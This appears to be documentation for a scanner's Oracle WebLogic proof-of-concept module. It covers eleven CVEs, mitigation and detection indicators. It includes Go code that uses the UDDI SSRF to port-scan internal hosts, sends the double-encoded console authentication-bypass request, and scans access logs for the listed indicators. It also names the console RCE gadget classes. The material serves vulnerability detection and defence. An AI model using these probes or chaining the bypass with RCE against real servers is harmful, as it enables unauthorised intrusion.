Overview
Oracle WebLogic Server is a Java EE application server. scan4all includes POCs for 11 Weblogic vulnerabilities disclosed between 2014 and 2021, covering SSRF, XML and Java deserialization, arbitrary file upload, and administration console authentication bypass and RCE.
Weblogic vulnerabilities are frequently targeted in the wild. Ensure your Weblogic servers are patched and properly configured.
Supported Vulnerabilities
CVE-2014-4210 - SSRF Vulnerability
Type: SSRF (Server-Side Request Forgery)
Affected Versions: 10.0.2.0, 10.3.6.0
Discovery Date: 2014
CVSS Score: 5.8 (Medium)
Description: The UDDI explorer's SearchPublicRegistries.jsp fetches the URL supplied in its operator form parameter on the server side. An unauthenticated attacker can point it at internal hosts and read the different error messages the page returns, turning the server into a port scanner for the internal network.
Detection Method:
// Checks for the vulnerable UDDI explorer endpoint (reachable without authentication)
GET /uddiexplorer/SearchPublicRegistries.jsp
Vulnerable Path: /uddiexplorer/SearchPublicRegistries.jsp
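The probe below is an added example of how the SSRF is turned into an internal port check; it is not scan4all's own POC code. It submits the search form with operator set to an internal URL and classifies the XML_SoapException text that an unpatched server echoes back. The error strings used for classification ("did not have a valid SOAP content-type" for an answering HTTP service, "could not connect over HTTP to server" for a closed port, "No route to host" for an unreachable host) are assumptions based on commonly reported output, and the mock server is a constructed test double so the code runs offline.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
	"time"
)

// PortState is what the UDDI explorer's error text tells us about the
// internal host:port named in the "operator" parameter.
type PortState string

const (
	StateOpen          PortState = "open"           // an HTTP service answered (non-SOAP content type)
	StateClosed        PortState = "closed"         // TCP connect failed
	StateUnreachable   PortState = "unreachable"    // no route to host
	StateNotVulnerable PortState = "not-vulnerable" // endpoint missing (404) or removed
	StateUnknown       PortState = "unknown"
)

// ClassifyUDDIResponse maps the exception text that the unpatched page echoes
// back to a port state. The marker strings are an assumption of this example.
func ClassifyUDDIResponse(status int, body string) PortState {
	if status == http.StatusNotFound {
		return StateNotVulnerable
	}
	switch {
	case strings.Contains(body, "did not have a valid SOAP content-type"):
		return StateOpen
	case strings.Contains(body, "could not connect over HTTP to server"),
		strings.Contains(body, "Connection refused"):
		return StateClosed
	case strings.Contains(body, "No route to host"):
		return StateUnreachable
	default:
		return StateUnknown
	}
}

// ProbeInternalPort submits the search form with operator=<target> and
// classifies the answer. base is e.g. "http://weblogic.example.com:7001".
func ProbeInternalPort(client *http.Client, base, target string) (PortState, error) {
	endpoint := strings.TrimRight(base, "/") + "/uddiexplorer/SearchPublicRegistries.jsp"
	form := url.Values{
		"rdoSearch":     {"name"},
		"txtSearchname": {"scan"},
		"selfor":        {"Business location"},
		"btnSubmit":     {"Search"},
		"operator":      {target}, // the SSRF sink: fetched server-side
	}
	resp, err := client.PostForm(endpoint, form)
	if err != nil {
		return StateUnknown, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return StateUnknown, err
	}
	return ClassifyUDDIResponse(resp.StatusCode, string(body)), nil
}

// NewMockUDDIServer emulates an unpatched explorer so the probe runs offline:
// port 7001 "exists" as an HTTP service, every other port is closed.
// Constructed test double, not real WebLogic output.
func NewMockUDDIServer() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path != "/uddiexplorer/SearchPublicRegistries.jsp" {
			http.NotFound(w, r)
			return
		}
		op := r.FormValue("operator")
		if strings.HasSuffix(op, ":7001") {
			fmt.Fprintf(w, "weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: %s which did not have a valid SOAP content-type: text/html.", op)
			return
		}
		port := op[strings.LastIndex(op, ":")+1:]
		fmt.Fprintf(w, "weblogic.uddi.client.structures.exception.XML_SoapException: Tried all: '1' addresses, but could not connect over HTTP to server: '127.0.0.1', port: '%s'", port)
	}))
}

func main() {
	srv := NewMockUDDIServer()
	defer srv.Close()
	client := &http.Client{Timeout: 5 * time.Second}
	for _, port := range []string{"7001", "22", "3306"} {
		state, err := ProbeInternalPort(client, srv.URL, "http://127.0.0.1:"+port)
		fmt.Printf("127.0.0.1:%s -> %s (err=%v)\n", port, state, err)
	}
}
```

Against a real target the client needs a timeout, because a probe of a filtered port only returns once the server-side connect attempt gives up; the state strings are what a scanner should report, not whether the page "responded".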
CVE-2017-3506 - WLS-WSAT Component RCE
Type: Remote Code Execution
Affected Versions: 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1, 12.2.1.2
Discovery Date: April 2017
CVSS Score: 7.4 (High)
Description: Unauthenticated remote code execution via the WLS-WSAT component. SOAP requests to /wls-wsat/CoordinatorPortType (and the other wls-wsat endpoints) are parsed with java.beans.XMLDecoder, which instantiates whatever classes the attacker's XML names, so a crafted body can run arbitrary commands as the WebLogic user.
Component: wls-wsat (Web Services Atomic Transactions)
CVE-2017-10271 - WLS-WSAT Component RCE
Type: Remote Code Execution
Affected Versions: 10.3.6.0, 12.1.3.0, 12.2.1.1, 12.2.1.2
Discovery Date: October 2017
CVSS Score: 9.8 (Critical)
Description: Bypass of the CVE-2017-3506 fix in the same WLS-WSAT component. The April patch blacklisted the <object> element in the XMLDecoder input; the same payload expressed with <void> or <new>/<array> elements still reaches XMLDecoder. This is one of the most exploited Weblogic vulnerabilities and was used at scale for cryptomining once public exploits appeared.
Impact: Complete server compromise without authentication
CVE-2018-2894 - Unrestricted File Upload
Type: Arbitrary File Upload
Affected Versions: 12.1.3.0, 12.2.1.2, 12.2.1.3
Discovery Date: July 2018
CVSS Score: 9.8 (Critical)
Description: Unrestricted file upload in the Web Service Test Page (ws_utc). The page's keystore import (config.do) and test-case (begin.do) handlers accept arbitrary files, and the attacker can first change the Work Home Dir setting so that uploads land in a directory served by the web container, then upload a JSP webshell and request it. The test page is enabled by default in development mode and disabled in production mode, which limits exposure of correctly configured servers.
Vulnerable Components:
Web Service Test Page (/ws_utc/begin.do, /ws_utc/config.do)
Configuration management (the Work Home Dir setting in config.do, which chooses where uploads are written)
CVE-2019-2725 - Async Deserialization RCE
Type: Deserialization RCE
Affected Versions: 10.3.6.0, 12.1.3.0
Discovery Date: April 2019
CVSS Score: 9.8 (Critical)
Description: Deserialization in the wls9_async_response component (and again in wls-wsat) allowing unauthenticated remote code execution. The SOAP header of a request to /_async/AsyncResponseService is handed to XMLDecoder, the same sink as CVE-2017-10271, behind a different set of blacklisted elements.
Component: wls9_async_response.war, endpoint /_async/AsyncResponseService
CVE-2019-2729 - Async Deserialization RCE
Type: Deserialization RCE
Affected Versions: 10.3.6.0, 12.1.3.0
Discovery Date: June 2019
CVSS Score: 9.8 (Critical)
Description: Bypass of the CVE-2019-2725 patch in the same wls9_async / wls-wsat XMLDecoder path. The April fix only added more elements to the blacklist, so Oracle had to ship an out-of-band security alert in June.
CVE-2019-2729 being a patch bypass for CVE-2019-2725 illustrates why blacklisting deserialization input is fragile: the reliable fix is to remove the component or the XMLDecoder sink rather than filter its input.
CVE-2020-2883 - IIOP/T3 Deserialization RCE
Type: Deserialization RCE
Affected Versions: 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4
Discovery Date: April 2020
CVSS Score: 9.8 (Critical)
Description: Java native deserialization of objects received over the T3 and IIOP listeners, exploitable without authentication using gadget chains in the bundled Coherence library; it bypasses the fix for CVE-2020-2555. Both protocols are multiplexed on the same listen port as HTTP (7001 by default), so HTTP-layer filtering of console or web paths does not block it.
Protocols Affected:
IIOP (Internet Inter-ORB Protocol)
T3 (WebLogic proprietary protocol)
CVE-2020-14882 - Console Authentication Bypass
Type: Authentication Bypass / RCE
Affected Versions: 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Discovery Date: October 2020
CVSS Score: 9.8 (Critical)
Description: Authentication bypass in the administration console. Requests under /console/css/ are served without a session; a double URL-encoded traversal (%252e%252e%252f) in that path is decoded again on the server and lands on console.portal, so an unauthenticated attacker reaches the authenticated console pages. On its own it yields console access; chained with CVE-2020-14883 it yields arbitrary code execution.
Detection Method:
GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a
A vulnerable server answers 200 with a console page; a patched server does not serve the console page to an unauthenticated client (typically a redirect to the login form or a 404). Send the request with redirects disabled so the two cases stay distinguishable.
Vulnerable Endpoint: WebLogic Administration Console
This vulnerability was actively exploited in the wild within days of disclosure. Immediate patching is critical.
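The check below is an added example of the detection request above, written here and not taken from scan4all's POC. It sends the double-encoded traversal with redirects disabled and classifies the answer. The "WLS Console" title marker used to recognise an unauthenticated console page is an assumption about unpatched output, and the mock console is a constructed test double so the check runs offline; the only thing it reuses from the page is the request line.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"time"
)

// Verdict is the outcome of the CVE-2020-14882 traversal check.
type Verdict string

const (
	VerdictVulnerable Verdict = "vulnerable" // console page served without a session
	VerdictPatched    Verdict = "patched"    // bounced to the login form
	VerdictNoConsole  Verdict = "no-console" // /console not deployed or not reachable
	VerdictUnknown    Verdict = "unknown"
)

// BypassPath is the double URL-encoded "../" that escapes the unauthenticated
// /console/css/ static directory and lands on console.portal. The query string
// is the one quoted in the detection method above.
const BypassPath = "/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=a"

// ClassifyConsoleResponse decides from status, Location header and body.
// The "WLS Console" title marker is an assumption about unpatched output.
func ClassifyConsoleResponse(status int, location, body string) Verdict {
	switch {
	case status == http.StatusOK && strings.Contains(body, "WLS Console"):
		return VerdictVulnerable
	case status == http.StatusFound && strings.Contains(location, "LoginForm.jsp"):
		return VerdictPatched
	case status == http.StatusNotFound:
		return VerdictNoConsole
	default:
		return VerdictUnknown
	}
}

// CheckConsoleBypass performs the request. Redirects must NOT be followed,
// otherwise the login redirect of a patched server would be followed to a
// 200 page; the caller's client is copied so its own policy is untouched.
func CheckConsoleBypass(client *http.Client, base string) (Verdict, error) {
	c := *client
	c.CheckRedirect = func(*http.Request, []*http.Request) error { return http.ErrUseLastResponse }
	// net/url re-escapes the "%" in the decoded path, so the wire request still
	// carries the literal %252e%252e%252f that the server-side double-decode needs.
	req, err := http.NewRequest(http.MethodGet, strings.TrimRight(base, "/")+BypassPath, nil)
	if err != nil {
		return VerdictUnknown, err
	}
	resp, err := c.Do(req)
	if err != nil {
		return VerdictUnknown, err
	}
	defer resp.Body.Close()
	body, _ := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	return ClassifyConsoleResponse(resp.StatusCode, resp.Header.Get("Location"), string(body)), nil
}

// NewMockConsole emulates the console for offline runs (constructed test
// double). patched=false serves the home page when the traversal bytes are
// present; patched=true always redirects anonymous requests to the login form.
func NewMockConsole(patched bool) *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !strings.HasPrefix(r.URL.Path, "/console/") {
			http.NotFound(w, r)
			return
		}
		if !patched && strings.Contains(r.RequestURI, "/console/css/%252e%252e%252fconsole.portal") {
			fmt.Fprint(w, "<html><title>Home Page - base_domain - WLS Console</title></html>")
			return
		}
		http.Redirect(w, r, "/console/login/LoginForm.jsp", http.StatusFound)
	}))
}

func main() {
	client := &http.Client{Timeout: 5 * time.Second}
	for _, patched := range []bool{false, true} {
		srv := NewMockConsole(patched)
		v, err := CheckConsoleBypass(client, srv.URL)
		fmt.Printf("patched=%v -> %s (err=%v)\n", patched, v, err)
		srv.Close()
	}
}
```

The redirect handling is the part scanners most often get wrong: a client that follows the 302 to LoginForm.jsp sees a 200 and a page mentioning the console on a fully patched server.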
CVE-2020-14883 - Console RCE
Type: Remote Code Execution
Affected Versions: 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Discovery Date: October 2020
CVSS Score: 7.2 (High)
Description: Code execution from inside the console. The handle parameter of console.portal names a class that the console instantiates with an attacker-controlled string argument: com.tangosol.coherence.mvel2.sh.ShellSession evaluates the string as MVEL, and com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext loads a remote Spring bean definition. It requires console access, which is why it scores lower than CVE-2020-14882 and why the two are chained.
Common Attack Chain: CVE-2020-14882 (reach console.portal without authentication) → CVE-2020-14883 (handle= gadget executes code)
CVE-2021-2109 - Unauthorized JNDI Access
Type: JNDI Injection
Affected Versions: 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4, 14.1.1.0
Discovery Date: January 2021
CVSS Score: 5.9 (Medium)
Description: JNDI injection in the administration console. A JNDI name taken from a console request is passed to an unfiltered JNDI lookup, so a user with console access, or an attacker who has bypassed authentication with CVE-2020-14882, can point the lookup at an attacker-controlled LDAP server and obtain remote code execution in the server's JVM.
Component: JNDI (Java Naming and Directory Interface) lookups issued by the console
CNVD-C-2019-48814
Type: Deserialization RCE (CNVD identifier)
Affected Versions: 10.3.6.0, 12.1.3.0 (as for CVE-2019-2725)
Discovery Date: April 2019
Source: China National Vulnerability Database
Description: CNVD-C-2019-48814 is the CNVD identifier for the wls9_async_response deserialization bug, published before Oracle assigned CVE-2019-2725; the two entries describe the same issue, and this POC targets the same /_async/AsyncResponseService endpoint.
Location: pocs_go/oracle/weblogic/CNVD-C-2019-48814.go
Usage
Scanning for Weblogic Vulnerabilities
# Scan a single Weblogic server
scan4all -h http://weblogic.example.com:7001
# Scan multiple Weblogic servers
scan4all -l weblogic_servers.txt
# Focus on specific CVE
scan4all -h http://weblogic.example.com:7001 -poc CVE-2020-14882
Common Weblogic Ports
7001 - Default HTTP listen port; T3 and IIOP are multiplexed on the same port, so it also carries the CVE-2020-2883 attack surface
7002 - Default HTTPS (and T3S/IIOPS) listen port
7003-7009 - Ports commonly assigned to additional managed servers
Mitigation
Apply Oracle Security Patches
Install the latest Critical Patch Updates (CPU) from Oracle.
Disable Unnecessary Components
Undeploy wls-wsat, wls9_async_response and the UDDI explorer if they are not used, and keep the Web Service Test Page disabled (it is off in production mode).
Implement Network Segmentation
Restrict access to the console and to the T3/IIOP listeners: disable the console where it is not needed (Domain > Configuration > General > Console Enabled), reach the admin server only from a management network, and use WebLogic connection filters to deny t3/t3s/iiop from untrusted sources, since they share the HTTP port.
Enable Security Features
Configure authentication, authorization, and audit logging.
Monitor for Exploitation
Watch for suspicious requests to known vulnerable endpoints.
Detection Indicators
Network Indicators
Requests to /uddiexplorer/
Requests to /_async/ or /wls-wsat/
Encoded console paths: %252e%252e%252f
POST bodies to /wls-wsat/ or /_async/ containing XMLDecoder markup (<java>, <void>, <object>, <new> elements naming classes such as java.lang.ProcessBuilder); access logs do not record bodies, so this needs a proxy, WAF or packet capture
File System Indicators
Unexpected JSP files in web directories
Modified configuration files
New user accounts
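The scanner below is an added example of applying the network indicators above to web server access logs; it is not part of scan4all. It parses Common/Combined Log Format lines, matches the request target against the indicator paths both raw and after one round of percent-decoding (so an extra encoding layer does not hide the console traversal), and reports each hit with the line, client IP and the CVE family it points to. The /ws_utc/ path for the CVE-2018-2894 test page is added here beyond the page's list, and the sample log lines are constructed, not real WebLogic output.

```go
package main

import (
	"bufio"
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Finding is one access-log line that matched a Weblogic exploitation indicator.
type Finding struct {
	Line      int
	ClientIP  string
	Request   string // "METHOD target" as logged
	Indicator string
}

// indicators are the network indicators from the list above, plus the ws_utc
// path of the CVE-2018-2894 test page (added here). Needles are lower-case
// because targets are lowered before matching.
var indicators = []struct{ name, needle string }{
	{"CVE-2020-14882 console path traversal", "%252e%252e%252f"},
	{"CVE-2014-4210 UDDI explorer SSRF", "/uddiexplorer/"},
	{"CVE-2019-2725/2729 async deserialization", "/_async/"},
	{"CVE-2017-3506/10271 wls-wsat deserialization", "/wls-wsat/"},
	{"CVE-2018-2894 ws_utc upload", "/ws_utc/"},
}

// clfRequest extracts client IP, method and request target from a
// Common/Combined Log Format entry.
var clfRequest = regexp.MustCompile(`^(\S+) \S+ \S+ \[[^\]]*\] "([A-Z]+) ([^" ]+)[^"]*"`)

// SampleLog is constructed for this example; it is not real WebLogic output.
const SampleLog = `10.0.0.5 - - [10/Nov/2020:13:14:15 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 4112 "-" "python-requests/2.24"
10.0.0.9 - - [10/Nov/2020:13:14:17 +0000] "POST /_async/AsyncResponseService HTTP/1.1" 202 0 "-" "Mozilla/5.0"
192.168.1.20 - - [10/Nov/2020:13:14:20 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 2711 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Nov/2020:13:14:22 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1337 "-" "curl/7.68.0"
10.0.0.5 - - [10/Nov/2020:13:14:30 +0000] "POST /uddiexplorer/SearchPublicRegistries.jsp HTTP/1.1" 200 5120 "-" "python-requests/2.24"`

// MatchIndicator returns the name of the first indicator found in target,
// checking the raw target and the target after one round of percent-decoding
// so that an extra layer of encoding (%25252e...) does not hide the traversal.
func MatchIndicator(target string) string {
	lower := strings.ToLower(target)
	decoded := lower
	if d, err := url.PathUnescape(lower); err == nil {
		decoded = strings.ToLower(d)
	}
	for _, ind := range indicators {
		if strings.Contains(lower, ind.needle) || strings.Contains(decoded, ind.needle) {
			return ind.name
		}
	}
	return ""
}

// ScanAccessLog walks the log line by line and reports every matching request.
// Lines that are not in CLF shape are skipped rather than treated as errors.
func ScanAccessLog(log string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(log))
	for n := 1; sc.Scan(); n++ {
		m := clfRequest.FindStringSubmatch(sc.Text())
		if m == nil {
			continue
		}
		if ind := MatchIndicator(m[3]); ind != "" {
			out = append(out, Finding{Line: n, ClientIP: m[1], Request: m[2] + " " + m[3], Indicator: ind})
		}
	}
	return out
}

func main() {
	for _, f := range ScanAccessLog(SampleLog) {
		fmt.Printf("line %d %-13s %-60s %s\n", f.Line, f.ClientIP, f.Request, f.Indicator)
	}
}
```

Because the traversal indicator is matched after one decode as well as raw, a request using %25252e (triple encoding) is still flagged; the LoginForm.jsp line is a normal console login and produces no finding.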
Source Code Location
pocs_go/weblogic/
├── CVE_2014_4210.go
├── CVE_2017_3506.go
├── CVE_2017_10271.go
├── CVE_2018_2894.go
├── CVE_2019_2725.go
├── CVE_2019_2729.go
├── CVE_2020_2883.go
├── CVE_2020_14882.go
├── CVE_2020_14883.go
└── CVE_2021_2109.go
pocs_go/oracle/weblogic/
└── CNVD-C-2019-48814.go
All POCs are implemented for detection purposes. Responsible use and proper authorization are required.